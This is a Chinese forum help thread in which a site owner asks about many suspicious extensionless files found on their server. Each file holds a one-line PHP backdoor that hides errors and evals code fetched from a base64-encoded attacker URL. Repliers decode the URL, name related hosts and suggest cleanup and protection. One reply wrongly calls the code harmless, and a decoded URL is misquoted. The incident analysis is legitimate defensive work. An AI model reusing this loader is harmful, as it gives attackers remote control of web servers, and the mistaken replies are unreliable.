【求助】无意间发现服务器网站里有很多这样的文件
各种名为“web”,"image","log",“cache”并且没有后缀的文件,每个文件夹下都有。内容为:<?php ini_set("display_errors", "off");eval('?>'.file_get_contents(base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==')));?>
且都一致。请教大神,这段代码有什么作用?能做什么?有什么危害?该如何防止再次发生? 明显是被人挂马啦,后边就是执行base64解码地址的内容 网站被人搞后门了,通过这个函数连接base64后面加密的数据,把服务停一停,找找有没有马,以后挂个日志啥的方便检测 这段代码是用于关闭 PHP 错误报告的。通过设置 ini_set("display_errors", "off");,PHP 将不会显示错误信息。这通常在生产环境中使用,以避免向用户展示敏感的错误信息。 使用ini_set函数关闭了错误显示(display_errors设置为"off"),这意味着任何错误都不会显示给终端用户。
使用eval函数执行了一段由base64_decode解码后的字符串内容。
l-l ttp://8.laite002.cc/jsc/xgjsc.txt
xgjsc.txt 内容是一个 PHP 的文件
ttp://mulu.laite002.cc:81
ttp://jschl.nn02.cc
综合判断, 你的网站被黑了,,, 文件上传漏洞和命令执行漏洞。
解决: 买个 WAF 设备,更新代码,更新网站的底层应用
这段代码看起来是 PHP 中的一段远程代码执行(Remote Code Execution, RCE)攻击代码。它试图通过执行远程的恶意代码来获取对受感染服务器的控制权。
ini_set("display_errors", "off");: 这一行代码试图关闭 PHP 的错误显示。这样做可能是为了隐藏执行中的任何错误消息,以防止被发现。
eval('?>'.file_get_contents(base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==')));: 这是关键的恶意代码。它使用函数从远程服务器下载一个文件,并将其内容传递给函数执行。这个文件的 URL 被使用了 Base64 编码,因此需要先解码才能知道其真实地址。file_get_contentseval
让我们解码 Base64 编码的部分来获取文件的实际 URL:
php
echo base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==');
解码后得到的 URL 是 ,它指向了一个远程的文本文件。http://8.laite002.cc/xgjsc.txt
如果你是在处理这段代码的环境下工作,强烈建议立即停止执行该代码,并对服务器进行全面的安全审查和修复。 这是木马么?学艺不精继续向高手学习 用D盾试下呢!
页:
[1]